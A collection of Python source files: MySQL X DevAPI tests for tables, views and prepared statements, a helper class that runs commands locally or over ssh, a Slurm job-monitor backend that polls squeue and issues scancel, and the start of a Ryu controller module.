        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (42, 'Wilma', NULL, NULL, '1975-11-11', "
        "'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 1)"
        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (67, 'Betty', NULL, NULL, '2015-06-21', "
        "'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
        "".format(table_name)).execute()
    table = self.schema.get_table("test")
    result = table.select().execute()
    result.fetch_all()
    col = result.columns[0]
    self.assertEqual("age", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.INT, col.get_type())
    col = result.columns[1]
    self.assertEqual("name", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.STRING, col.get_type())
    # Default collation changed in MySQL 8.0.1 (utf8mb4_0900_ai_ci)
    if tests.MYSQL_VERSION >= (8, 0, 1):
        self.assertEqual("utf8mb4_0900_ai_ci", col.get_collation_name())
        self.assertEqual("utf8mb4", col.get_character_set_name())
    col = result.columns[2]
    self.assertEqual("pic", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual("binary", col.get_collation_name())
    self.assertEqual("binary", col.get_character_set_name())
    self.assertEqual(mysqlx.ColumnType.BYTES, col.get_type())
    col = result.columns[3]
    self.assertEqual("config", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.JSON, col.get_type())
    col = result.columns[4]
    self.assertEqual("created", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.DATE, col.get_type())
    col = result.columns[5]
    self.assertEqual("updated", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.DATETIME, col.get_type())
    col = result.columns[6]
    self.assertEqual("ts", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.TIMESTAMP, col.get_type())
    col = result.columns[7]
    self.assertEqual("active", col.get_column_name())
    self.assertEqual("test", col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.BIT, col.get_type())
    # get_columns() must return the same sequence as the attribute
    self.assertEqual(result.columns, result.get_columns())
    drop_table(self.schema, "test")
def test_is_view(self):
    """Table.is_view() distinguishes base tables from views."""
    table_name = "table_test"
    view_name = "view_test"
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, table_name)).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, table_name, "1")).execute()
    table = self.schema.get_table(table_name)
    self.assertFalse(table.is_view())
    self.session.sql(_CREATE_TEST_VIEW_QUERY.format(
        self.schema_name, view_name,
        self.schema_name, table_name)).execute()
    view = self.schema.get_table(view_name)
    self.assertTrue(view.is_view())
    drop_table(self.schema, table_name)
    drop_view(self.schema, view_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 14),
                 "Prepared statements not supported")
def test_prepared_statements(self):
    """Statements transparently switch to server-side prepared
    statements on repeated execution and deallocate on modification.

    The per-statement flags checked are: ``changed`` (definition
    modified since last run), ``prepared`` (a server-side prepared
    statement exists), ``repeated`` (executed more than once unchanged)
    and ``exec_counter``.  The server-side view queried via
    ``_PREP_STMT_QUERY`` confirms the SQL text and execution count.
    """
    session = mysqlx.get_session(self.connect_kwargs)
    schema = session.get_schema(self.schema_name)
    # Helper: compare a statement's bookkeeping flags/counter at once
    expected_stmt_attrs = \
        lambda stmt, changed, prepared, repeated, exec_counter: \
        stmt.changed == changed and stmt.prepared == prepared and \
        stmt.repeated == repeated and stmt.exec_counter == exec_counter
    table_name = "prepared_table_test"
    session.sql("CREATE TABLE {}.{}(id INT KEY AUTO_INCREMENT, "
                "name VARCHAR(50), age INT)"
                "".format(self.schema_name, table_name)).execute()
    table = schema.get_table(table_name)
    table.insert("name", "age") \
        .values("Fred", 21) \
        .values("Barney", 28) \
        .values("Wilma", 42) \
        .values("Betty", 67) \
        .values("Bob", 75).execute()
    # SelectStatement
    select = table.select().where("age == :age")
    self.assertTrue(expected_stmt_attrs(select, True, False, False, 0))
    # On the first call should: Crud::Select (without prepared statement)
    select.bind("age", 21).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    select.bind("age", 28).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    select.bind("age", 42).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
    expected_sql_text = ("SELECT * FROM `{}`.`{}` "
                         "WHERE (`age` = ?)"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], select.exec_counter - 1)
    # Using sort() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Select
    select.bind("age", 21).order_by("age").execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    select.bind("age", 42).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
    # The previous statement should be closed since it had no limit/offset
    # Prepare::Deallocate + Crud::Find
    select.bind("age", 67).limit(1).offset(0).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, True, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    select.bind("age", 75).limit(1).offset(0).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(select, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
    expected_sql_text = ("SELECT * FROM `{}`.`{}` "
                         "WHERE (`age` = ?) ORDER BY `age` LIMIT ?, ?"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], select.exec_counter)
    # UpdateStatement
    update = table.update().where("id == :id").set("age", 18)
    self.assertTrue(expected_stmt_attrs(update, True, False, False, 0))
    # On the first call should: Crud::Update (without prepared statement)
    update.bind("id", 1).execute()
    self.assertTrue(expected_stmt_attrs(update, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    update.bind("id", 2).execute()
    self.assertTrue(expected_stmt_attrs(update, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
    expected_sql_text = ("UPDATE `{}`.`{}` SET `age`=18 "
                         "WHERE (`id` = ?)"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], update.exec_counter - 1)
    # Using set() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Update
    update.bind("id", "3").set("age", 92).execute()
    self.assertTrue(expected_stmt_attrs(update, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    update.bind("id", "4").execute()
    self.assertTrue(expected_stmt_attrs(update, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
    expected_sql_text = ("UPDATE `{}`.`{}` "
                         "SET `age`=92 WHERE (`id` = ?)"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], update.exec_counter - 1)
    # DeleteStatement
    delete = table.delete().where("id == :id")
    self.assertTrue(expected_stmt_attrs(delete, True, False, False, 0))
    # On the first call should: Crud::Delete (without prepared statement)
    delete.bind("id", 1).execute()
    self.assertTrue(expected_stmt_attrs(delete, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    delete.bind("id", 2).execute()
    self.assertTrue(expected_stmt_attrs(delete, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    delete.bind("id", 3).execute()
    self.assertTrue(expected_stmt_attrs(delete, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
    expected_sql_text = ("DELETE FROM `{}`.`{}` "
                         "WHERE (`id` = ?)"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], delete.exec_counter - 1)
    # Using sort() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Delete
    delete.bind("id", 3).sort("age ASC").execute()
    self.assertTrue(expected_stmt_attrs(delete, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    delete.bind("id", 4).execute()
    self.assertTrue(expected_stmt_attrs(delete, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    delete.bind("id", 5).execute()
    self.assertTrue(expected_stmt_attrs(delete, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
    expected_sql_text = ("DELETE FROM `{}`.`{}` "
                         "WHERE (`id` = ?) ORDER BY `age`"
                         "".format(self.schema_name, table_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], delete.exec_counter - 1)
    drop_table(schema, table_name)
    session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxViewTests(tests.MySQLxTests):
    """CRUD tests that operate through SQL views instead of base tables."""

    def setUp(self):
        """Open a session; per-test table/view are removed in tearDown()."""
        self.connect_kwargs = tests.get_mysqlx_config()
        self.schema_name = self.connect_kwargs["schema"]
        self.table_name = "table_test"
        self.view_name = "view_test"
        try:
            self.session = mysqlx.get_session(self.connect_kwargs)
        except mysqlx.Error as err:
            self.fail("{0}".format(err))
        self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
    """Drop the per-test table and view, then close the session."""
    drop_table(self.schema, self.table_name)
    drop_view(self.schema, self.view_name)
    self.session.close()
def test_exists_in_database(self):
    """exists_in_database() is False before and True after creation."""
    view = self.schema.get_view(self.view_name)
    self.assertFalse(view.exists_in_database())
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, self.table_name)).execute()
    defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
                                                 self.table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    self.assertTrue(view.exists_in_database())
def test_select(self):
    """select() through a view: ordering, filtering, flexible params."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50))"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (67, 'Betty')"
                     "".format(table_name)).execute()
    defined_as = "SELECT age, name FROM {0}".format(table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.select().order_by("age DESC").execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
    self.assertEqual(67, rows[0]["age"])
    result = view.select("age").where("age = 42").execute()
    self.assertEqual(1, len(result.columns))
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    # test flexible params
    result = view.select(['age', 'name']).order_by("age DESC").execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
def test_having(self):
    """group_by()/having() executed through a view."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
                     "gender CHAR(1))".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred', 'M')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney', 'M')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma', 'F')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (67, 'Betty', 'F')"
                     "".format(table_name)).execute()
    defined_as = "SELECT age, name, gender FROM {0}".format(table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.select().group_by("gender").order_by("age ASC").execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    self.assertEqual(21, rows[0]["age"])
    self.assertEqual(42, rows[1]["age"])
    result = view.select().group_by("gender").having("gender = 'F'") \
        .order_by("age ASC").execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    self.assertEqual(42, rows[0]["age"])
    # test flexible params
    result = view.select().group_by(["gender"]) \
        .order_by(["name DESC", "age ASC"]).execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    self.assertEqual(42, rows[0]["age"])
    self.assertEqual(21, rows[1]["age"])
def test_insert(self):
    """insert() through a view writes to the underlying table."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
                     "gender CHAR(1))".format(table_name)).execute()
    defined_as = "SELECT age, name, gender FROM {0}".format(table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.insert("age", "name").values(21, 'Fred') \
        .values(28, 'Barney') \
        .values(42, 'Wilma') \
        .values(67, 'Betty').execute()
    result = view.select().execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
    # test flexible params
    result = view.insert(["age", "name"]).values([35, 'Eddard']) \
        .values(9, 'Arya').execute()
    result = view.select().execute()
    rows = result.fetch_all()
    self.assertEqual(6, len(rows))
def test_update(self):
    """update() through a view modifies the underlying table."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50), "
                     "gender CHAR(1))".format(table_name)).execute()
    defined_as = ("SELECT age, name, gender FROM {0}".format(table_name))
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.insert("age", "name").values(21, 'Fred') \
        .values(28, 'Barney') \
        .values(42, 'Wilma') \
        .values(67, 'Betty').execute()
    result = view.update().set("age", 25).where("age == 21").execute()
    self.assertEqual(1, result.get_affected_items_count())
    # Fix: removed a stray ``drop_table(self.schema, "test")`` left over
    # from a copy-paste — this test never creates a table named "test";
    # cleanup of self.table_name and the view is handled by tearDown().
def test_delete(self):
    """delete() through a view removes rows from the base table."""
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, self.table_name)).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, self.table_name, "1")).execute()
    defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
                                                 self.table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    self.assertEqual(view.count(), 1)
    view.delete().where("id = 1").execute()
    self.assertEqual(view.count(), 0)
def test_count(self):
    """count() on a view, and the error after the view is dropped."""
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, self.table_name)).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, self.table_name, "1")).execute()
    defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
                                                 self.table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    self.assertEqual(view.count(), 1)
    drop_view(self.schema, self.view_name)
    # count() on a dropped view must raise
    self.assertRaises(mysqlx.OperationalError, view.count)
def test_results(self):
    """fetch_one() iterates view rows and returns None when exhausted."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (age INT, name VARCHAR(50))"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
                     "".format(table_name)).execute()
    defined_as = "SELECT age, name FROM {0}".format(table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.select().execute()
    self.assertEqual("Fred", result.fetch_one()["name"])
    self.assertEqual("Barney", result.fetch_one()["name"])
    self.assertEqual(None, result.fetch_one())
def test_auto_inc_value(self):
    """get_autoincrement_value() after inserting through a view."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql("CREATE TABLE {0} (id INT KEY AUTO_INCREMENT, "
                     "name VARCHAR(50))".format(table_name)).execute()
    result = self.session.sql("INSERT INTO {0} VALUES (NULL, 'Fred')"
                              "".format(table_name)).execute()
    self.assertEqual(1, result.get_autoincrement_value())
    defined_as = "SELECT id, name FROM {0}".format(table_name)
    view = create_view(self.schema, self.view_name, defined_as)
    result2 = view.insert("id", "name").values(None, "Boo").execute()
    self.assertEqual(2, result2.get_autoincrement_value())
def test_column_metadata(self):
    """Column metadata fetched through a view reports the view name."""
    table_name = "{0}.{1}".format(self.schema_name, self.table_name)
    self.session.sql(
        "CREATE TABLE {0}(age INT, name VARCHAR(50), pic VARBINARY(100), "
        "config JSON, created DATE, active BIT)"
        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (21, 'Fred', NULL, NULL, '2008-07-26', 0)"
        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (28, 'Barney', NULL, NULL, '2012-03-12'"
        ", 0)".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (42, 'Wilma', NULL, NULL, '1975-11-11', 1)"
        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (67, 'Betty', NULL, NULL, '2015-06-21', 0)"
        "".format(table_name)).execute()
    defined_as = ("SELECT age, name, pic, config, created, active FROM {0}"
                  "".format(table_name))
    view = create_view(self.schema, self.view_name, defined_as)
    result = view.select().execute()
    result.fetch_all()
    col = result.columns[0]
    self.assertEqual("age", col.get_column_name())
    self.assertEqual(self.view_name, col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.INT, col.get_type())
    col = result.columns[1]
    self.assertEqual("name", col.get_column_name())
    self.assertEqual(self.view_name, col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.STRING, col.get_type())
    col = result.columns[2]
    self.assertEqual("pic", col.get_column_name())
    self.assertEqual(self.view_name, col.get_table_name())
    self.assertEqual("binary", col.get_collation_name())
    self.assertEqual("binary", col.get_character_set_name())
    self.assertEqual(mysqlx.ColumnType.BYTES, col.get_type())
    col = result.columns[3]
    self.assertEqual("config", col.get_column_name())
    self.assertEqual(self.view_name, col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.JSON, col.get_type())
    # NOTE(review): columns[4] ("created") is not asserted here — verify
    # whether that omission is intentional.
    col = result.columns[5]
    self.assertEqual("active", col.get_column_name())
    self.assertEqual(self.view_name, col.get_table_name())
    self.assertEqual(mysqlx.ColumnType.BIT, col.get_type())
|
remotehost.py | # Host class
# Copyright (c) 2016, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
import subprocess
import threading
logger = logging.getLogger()


def execute_thread(command, reply):
    """Run *command* and append (exit_status, output) to *reply*.

    Thread target used by Host.execute_run(); the caller inspects the
    *reply* list after joining the worker thread.
    """
    try:
        exit_status = 0
        output = subprocess.check_output(command, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as err:
        exit_status = err.returncode
        output = err.output
    rendered = "".join(" " + part for part in command)
    logger.debug("thread cmd: " + rendered)
    logger.debug("thread exit status: " + str(exit_status))
    logger.debug("thread exit buf: " + str(output))
    reply.append(exit_status)
    reply.append(output)
class Host():
    """A local or remote (ssh) command-execution target.

    When *host* is None commands run locally; otherwise they are wrapped
    in ``ssh user@host``.
    """

    def __init__(self, host=None, ifname=None, port=None, name="", user="root"):
        self.host = host
        self.name = name
        self.user = user
        self.ifname = ifname
        self.port = port
        # Fall back to the host address as display name
        if self.name == "" and host is not None:
            self.name = host

    def local_execute(self, command):
        """Run *command* locally; return (exit_status, output_bytes)."""
        logger.debug("execute: " + str(command))
        try:
            status = 0
            buf = subprocess.check_output(command, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            status = e.returncode
            buf = e.output
        logger.debug("status: " + str(status))
        logger.debug("buf: " + str(buf))
        return status, buf

    def execute(self, command):
        """Run *command* on this host (via ssh if remote).

        Returns (exit_status, output_bytes).
        """
        if self.host is None:
            return self.local_execute(command)
        cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
        _cmd = self.name + " execute: "
        for c in cmd:
            _cmd = _cmd + " " + c
        logger.debug(_cmd)
        try:
            status = 0
            buf = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            status = e.returncode
            buf = e.output
        logger.debug(self.name + " status: " + str(status))
        logger.debug(self.name + " buf: " + str(buf))
        return status, buf

    # async execute
    def execute_run(self, command, res):
        """Start *command* in a background thread; results land in *res*.

        Returns the started threading.Thread; pass it to
        wait_execute_complete() to join.
        """
        if self.host is None:
            cmd = command
        else:
            cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
        _cmd = self.name + " execute_run: "
        for c in cmd:
            _cmd = _cmd + " " + c
        logger.debug(_cmd)
        t = threading.Thread(target=execute_thread, args=(cmd, res))
        t.start()
        return t

    def wait_execute_complete(self, t, wait=None):
        """Join thread *t*, waiting at most *wait* seconds (None = forever)."""
        if wait is None:
            wait_str = "infinite"
        else:
            wait_str = str(wait) + "s"
        logger.debug(self.name + " wait_execute_complete(" + wait_str + "): ")
        # Bug fix: Thread.isAlive() was removed in Python 3.9; the
        # method has been is_alive() since Python 2.6.
        if t.is_alive():
            t.join(wait)
|
backend.py | import copy
import functools
import logging
import os
import re
import shutil
import subprocess
import threading
from collections import OrderedDict
from queue import Queue
from time import sleep
from typing import Iterable, List
import fabric
from paramiko.ssh_exception import SSHException
# Public API of this module.
__all__ = ["Cluster"]
# Named module logger for the stui backend.
logger = logging.getLogger("stui.backend")
def when_connected(decorated_f):
    """Decorator guarding Cluster methods that need a live connection.

    The wrapped method runs only after ``self.is_ready`` has been set;
    otherwise an EnvironmentError is raised.
    """
    @functools.wraps(decorated_f)
    def wrapper(self, *args, **kwargs):
        if self.is_ready.is_set():
            return decorated_f(self, *args, **kwargs)
        raise EnvironmentError  # TODO: Use a sensible exception
    return wrapper
class Job(object):
    """One squeue entry, parsed from a pipe-delimited output line."""

    def __init__(self, fields: Iterable[str], squeue_str: str):
        super().__init__()
        self.whole_line = squeue_str
        record = dict(zip(fields, squeue_str.split("|")))
        self.job_id = record["job_id_unique"]
        self.job_id_combined = record["job_id_base_idx"]
        self.job_id_base = record["job_id_base"]
        self.job_id_idx = record["job_id_idx"]
        self.nodes = record["nodes"].split(",")
        self.partition = record["partition"]
        self.name = record["job_name"]
        self.user = record["user"]
        self.state = record["state"]
        self.time = record["time"]
        self.nice = record["nice"]
        self.cpus = record["cpus"]
        self.gres = record["tres"]
        # squeue reports "N/A" as the array index for non-array jobs.
        self.is_array_job = self.job_id_idx != "N/A"
        self.array_total_jobs = None
        self.array_throttle = None
        if self.is_array_job and self.is_pending():
            if "%" in self.job_id_idx:
                # e.g. "0-9%2": total before '%', throttle after it.
                throttled = re.search(r"(\d+)%(\d+)$", self.job_id_idx)
                if throttled:
                    self.array_total_jobs = throttled.group(1)
                    self.array_throttle = throttled.group(2)
            else:
                # TODO: are there [ ]s?
                bracketed = re.search(r"_\[(\d+)\]$", self.job_id_idx)
                if bracketed:
                    self.array_total_jobs = bracketed.group(1)

    def __repr__(self):
        return f"Job {self.job_id} - State{self.state}"

    def is_running(self):
        """True while Slurm reports the job as RUNNING."""
        return self.state == "RUNNING"

    def is_pending(self):
        """True while Slurm reports the job as PENDING."""
        return self.state == "PENDING"

    def uses_gpu(self):
        """True when the job's TRES string mentions a GPU."""
        return "gpu" in self.gres

    def is_array_job_f(self):
        return self.is_array_job  # TODO: use property?

    def array_str(self):
        """Index portion of the job id for array jobs, else an empty string."""
        if self.is_array_job:
            return self.job_id_idx
        return ""
class Cluster(threading.Thread):
    """Background connection to a Slurm cluster, local or over SSH.

    A worker thread polls ``squeue`` roughly once per second, caching the
    result in ``latest_jobs``; queued control commands (``scancel`` etc.)
    are drained from ``requests`` in the same loop. ``is_ready`` is set once
    the connection is established, and the ``@when_connected`` methods
    refuse to run before that.
    """

    def __init__(self, remote=None):
        # remote: SSH host string, or None to use a local Slurm installation.
        super().__init__()
        self.use_fabric = True
        self.remote = remote
        # Set once the connection is up and cluster info has been fetched.
        self.is_ready = threading.Event()
        self.latest_jobs = []
        # Guards latest_jobs: written by the worker, read via get_jobs().
        self.lock = threading.Lock()
        self.requests = Queue()
        self.thread = None

    def connect(self, fd, ssh_username=None, ssh_password=None):
        """Start the worker thread.

        Connection status ("connection established", "need password",
        "wrong password") is reported by writing to file descriptor *fd*.
        """
        self.fd = fd
        self.ssh_username = ssh_username
        self.ssh_password = ssh_password
        # Wait for any previous worker to finish before starting a new one.
        if self.thread is not None:
            self.thread.join()
        self.thread = threading.Thread(target=self._thread_fn, daemon=True)
        self.thread.start()

    def _thread_fn(self):
        """Worker: open the connection, then poll jobs / serve requests forever."""
        if self.remote is None:
            if shutil.which("sinfo") is None:
                # TODO: Test this!
                raise SystemExit("Slurm binaries not found.")
        elif self.use_fabric:
            connect_kwargs = {
                "password": self.ssh_password,
                "look_for_keys": True,
                "allow_agent": True,
                "auth_timeout": 10,
                "timeout": 5,
            }
            self.fabric_connection = fabric.Connection(
                self.remote, user=self.ssh_username, connect_kwargs=connect_kwargs
            )
            try:
                self.fabric_connection.open()
            except SSHException as e:
                # Report authentication problems back through the pipe fd.
                if str(e) == "No authentication methods available":
                    os.write(self.fd, b"need password")
                elif str(e) == "Authentication failed.":
                    os.write(self.fd, b"wrong password")
                else:
                    raise SystemExit("Lost SSH connection.")
                return
        self.me = self._run_command("whoami")[0] # TODO
        self.config = self._get_config()
        self.my_partitions, self.all_partitions = self._get_partition_info()
        self.is_ready.set()
        os.write(self.fd, b"connection established")
        os.close(self.fd)
        self.fd = None
        try:
            while True:
                latest_jobs = self._get_jobs()
                with self.lock:
                    self.latest_jobs = latest_jobs
                # Serve at most one queued control command per polling cycle.
                if not self.requests.empty():
                    cmd = self.requests.get(block=False)
                    self._run_command(cmd)
                sleep(1)
        except:
            # if self.remote:
            #     self.fabric_connection.close()
            #     self.fabric_connection = fabric.Connection(self.remote)
            #     self.fabric_connection.open()
            raise SystemExit("Something went wrong.")

    def _run_command(self, cmd: str):
        """Run *cmd* on the cluster; return its stdout as a list of lines."""
        if self.remote is not None:
            if self.use_fabric:
                results = self.fabric_connection.run(cmd, hide=True)
                o = results.stdout.splitlines()
            else:
                cmd = f"ssh {self.remote} {cmd}"
                process = subprocess.run(cmd.split(" "), capture_output=True)
                o = process.stdout.decode("utf-8").splitlines()
        else:
            process = subprocess.run(cmd.split(" "), capture_output=True)
            o = process.stdout.decode("utf-8").splitlines()
        # TODO: for some reason lines are surrounded by quotes when not using SSH
        o = [line.strip('"') for line in o]
        return o

    def _get_config(self):
        """Parse ``scontrol show config`` output into a {key: value} dict."""
        o = self._run_command("scontrol show config")
        pattern = r"(\S+)\s*=(.*)"
        config = {}
        for line in o[1:]:
            try:
                match = re.search(pattern, line)
                config[match.group(1)] = match.group(2)
            except:
                # Skip banner/blank lines that don't match "key = value".
                continue
        return config

    def _get_partition_info(self):
        """Return (my partitions, all partitions) as lists of names."""
        my_p = self._run_command('sinfo --format="%R" --noheader')
        all_p = self._run_command('sinfo --format="%R" --noheader --all')
        return my_p, all_p

    def _get_jobs(self) -> List[Job]:
        """
        squeue has two formatting commands: --format and --Format (-o and -O). The
        former is more flexible in terms of constructing a string but it uses single
        letters for each field and slurm devs eventually ran out of letters to use! I
        think going forward they want people to use the long format. Some of the short
        format flags are not even documented, including the %b which I use is used to
        display TRES_PER_NODE. However, I prefer to use the short format because I can
        put my own delimiter character. It also assigns as many characters as needed to
        fully display a field. --Format on the other hand assigns 20 characters by
        default although you can specify more.
        Returns: List[Job]
        """
        fields = OrderedDict(
            {
                "job_id_unique": r"%A",  # for job arrays this will have a unique value for each element
                "job_id_base_idx": r"%i",  # for job arrays has the form "<base_job_id>_<index>"
                "job_id_base": r"%F",  # Job array's base job ID. For non-array jobs, this is the job ID
                "job_id_idx": r"%K",  # Job array's index
                "cpus": r"%C",
                "job_name": r"%j",
                "partition": r"%P",
                "reason": r"%r",
                "user": r"%u",
                "nice": r"%y",
                "state": r"%T",
                "time": r"%M",
                "tres": r"%b",
                "nodes": r"%N",
            }
        )
        cmd = f'squeue --noheader --all --format="{"|".join(fields.values())}"'
        cmd_output = self._run_command(cmd)
        return [Job(fields.keys(), line) for line in cmd_output]

    @when_connected
    def get_name(self):
        """Return the cluster name from the Slurm configuration."""
        return self.config["ClusterName"]

    @when_connected
    def get_jobs(self):
        """Return a deep copy of the most recently polled job list."""
        with self.lock:
            jobs_copy = copy.deepcopy(self.latest_jobs)
        return jobs_copy

    @when_connected
    def cancel_jobs(self, jobs):
        """Queue an scancel for the given Job objects."""
        job_ids = " ".join(str(j.job_id) for j in jobs)
        self.requests.put(f"scancel {job_ids}")

    @when_connected
    def cancel_my_jobs(self):
        """Queue an scancel for every job owned by the connected user."""
        self.requests.put(f"scancel -u {self.me}")

    @when_connected
    def cancel_my_newest_job(self):
        """Queue cancellation of the user's most recently submitted job."""
        self.requests.put(
            f'squeue -u {self.me} --sort=-V -h --format="%A" | head -n 1 | xargs scancel'
        )

    @when_connected
    def cancel_my_oldest_job(self):
        """Queue cancellation of the user's oldest submitted job."""
        self.requests.put(
            f'squeue -u {self.me} --sort=+V -h --format="%A" | head -n 1 | xargs scancel'
        )
|
ue_mac.py | """
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
from collections import namedtuple
import threading
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
